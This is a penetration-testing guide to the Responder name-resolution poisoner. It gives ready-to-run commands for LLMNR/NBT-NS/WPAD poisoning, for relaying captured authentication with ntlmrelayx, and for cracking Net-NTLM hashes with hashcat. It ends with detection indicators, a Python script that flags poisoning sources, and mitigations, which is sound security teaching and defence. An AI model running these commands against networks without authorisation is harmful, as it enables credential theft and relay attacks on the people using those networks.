Responder is a LLMNR/NBT-NS/mDNS poisoner that captures NTLM authentication by responding to name resolution broadcasts on the local network. It's typically the first tool run during an internal pentest to passively collect credentials.
- Repo: https://github.com/lgandx/Responder
- Purpose: Poison name resolution, capture Net-NTLM hashes, serve rogue services
When a Windows machine fails DNS resolution, it falls back to:
- LLMNR (Link-Local Multicast Name Resolution) — multicast on 5355/UDP
- NBT-NS (NetBIOS Name Service) — broadcast on 137/UDP
- mDNS (Multicast DNS) — multicast on 5353/UDP
Responder listens for these broadcasts and responds as the requested host, causing the victim to authenticate to the attacker.
```bash
# Start Responder on the network interface
responder -I eth0 -dwv
# Flags:
# -I Interface
# -d Enable DHCP responses
# -w Enable WPAD proxy
# -v Verbose
```

```bash
# Listen without poisoning — observe traffic
responder -I eth0 -A
```

When using Responder with ntlmrelayx, you must disable Responder's built-in servers that conflict with ntlmrelayx:
```ini
; /usr/share/responder/Responder.conf (Kali default path)
; Or: /opt/Responder/Responder.conf
[Responder Core]
; Disable these — ntlmrelayx will handle them
SMB = Off
HTTP = Off
; Keep these enabled
SQL = On
FTP = On
POP = On
SMTP = On
IMAP = On
LDAP = On
DNS = On
DHCP = Off
```

ntlmrelayx needs to bind to ports 445 (SMB) and 80 (HTTP) to intercept authentication and relay it. If Responder is also binding to these ports, they'll conflict.
Responder still handles the poisoning — it just sends victims to ntlmrelayx's IP instead of its own servers.
```bash
# Terminal 1: ntlmrelayx (handles SMB/HTTP auth)
ntlmrelayx.py -tf targets.txt -smb2support
# Terminal 2: Responder (poisons, but doesn't serve SMB/HTTP)
responder -I eth0 -dwv
```

Responder saves captured hashes to /usr/share/responder/logs/ (or wherever Responder is installed):
```bash
# View captured hashes
cat /usr/share/responder/logs/*.txt
# Format: username::domain:challenge:response:response
# Example:
# admin::CORP:1122334455667788:A1B2C3D4...:0101000000000000...
```

```bash
# Net-NTLMv2 with hashcat
hashcat -m 5600 hashes.txt wordlist.txt
# Net-NTLMv1 with hashcat
hashcat -m 5500 hashes.txt wordlist.txt
# Net-NTLMv1 — can also recover NT hash via crack.sh
# Set Responder to downgrade to NTLMv1 (--lm flag, risky)
```

```bash
# Enable WPAD for HTTP auth capture
responder -I eth0 -wFv
# -w Serve WPAD file
# -F Force NTLM auth on WPAD requests
# Victims requesting proxy config get redirected to authenticate
```

```bash
# Respond to DHCPv6 requests (assigns IPv6 DNS)
responder -I eth0 -d
```

Responder includes a legacy MultiRelay module, but ntlmrelayx is strongly preferred — it's more maintained and feature-rich.
- Always run in analyze mode (`-A`) first to understand traffic patterns
- Disable SMB and HTTP servers when using with ntlmrelayx
- Log locations change based on install path — check `Responder.conf` for `SessionLog`
- Use `-v` for verbose output to see what's being poisoned
- WPAD poisoning (`-w`) can generate a lot of traffic — use carefully
- Responder can cause disruption in production — poisoning legitimate name resolution can break services. Scope carefully.
- Hashes are captured per-user — you only need one response per user/machine
Detection indicators on the wire:
- LLMNR traffic from a single source responding to all queries
- NBT-NS responses from a non-standard host
- WPAD file served from an unexpected IP
- Multiple DNS suffix queries answered by the same IP
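As an added, defender-side example (not part of the original page or the Responder project), the following script turns the first indicator into a check: it parses constructed name-resolution response records and flags any source that answers many distinct names, or that answers a canary name no real host owns. The log line format, the threshold and the canary name are assumptions for this example.

```python
import re
from collections import defaultdict

# Constructed sample log lines (format is an assumption, not Responder or sensor output):
# <time> <proto> response from <src_ip>: <name> -> <answer_ip>
SAMPLE_LOG = """\
10:00:01 LLMNR response from 10.0.0.5: fileserver -> 10.0.0.5
10:00:04 NBT-NS response from 10.0.0.7: PRINTER01 -> 10.0.0.7
10:00:09 LLMNR response from 10.0.0.66: flieserver -> 10.0.0.66
10:00:10 LLMNR response from 10.0.0.66: wpad -> 10.0.0.66
10:00:12 NBT-NS response from 10.0.0.66: SRV-BACKUP -> 10.0.0.66
10:00:15 LLMNR response from 10.0.0.66: canary-does-not-exist -> 10.0.0.66
"""

LINE_RE = re.compile(
    r"^(?P<time>\S+) (?P<proto>LLMNR|NBT-NS|mDNS) response from (?P<src>[\d.]+): "
    r"(?P<name>\S+) -> (?P<answer>[\d.]+)$"
)


def parse_responses(text):
    """Parse lines matching LINE_RE into dicts; lines in another format are skipped."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            out.append(m.groupdict())
    return out


def find_poisoners(responses, min_names=3, canaries=("canary-does-not-exist",)):
    """Return {src_ip: [reasons]}. A legitimate host answers only for its own name, so a
    source answering >= min_names distinct names, or a canary name that no host owns,
    is Responder-like. Threshold and canary list are assumptions for this example."""
    names_by_src = defaultdict(set)
    reasons = defaultdict(list)
    for r in responses:
        name = r["name"].lower()
        names_by_src[r["src"]].add(name)
        if name in canaries:
            reasons[r["src"]].append(f"answered canary name {name} over {r['proto']}")
    for src, names in names_by_src.items():
        if len(names) >= min_names:
            reasons[src].append(f"answered {len(names)} distinct names: {', '.join(sorted(names))}")
    return dict(reasons)


if __name__ == "__main__":
    for src, why in find_poisoners(parse_responses(SAMPLE_LOG)).items():
        print(f"ALERT {src}: " + "; ".join(why))
```

Queries for a name that is deliberately not registered anywhere (the canary) give a high-confidence signal, since only a poisoner will ever answer them.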
Mitigations:
- Disable LLMNR: GPO → Computer Configuration → Administrative Templates → Network → DNS Client → Turn off multicast name resolution
- Disable NBT-NS: Network adapter settings → WINS → Disable NetBIOS over TCP/IP
- Disable mDNS: Not commonly needed; firewall port 5353
- Disable WPAD: GPO → Auto-detect proxy settings = Disabled, and remove WPAD DNS entries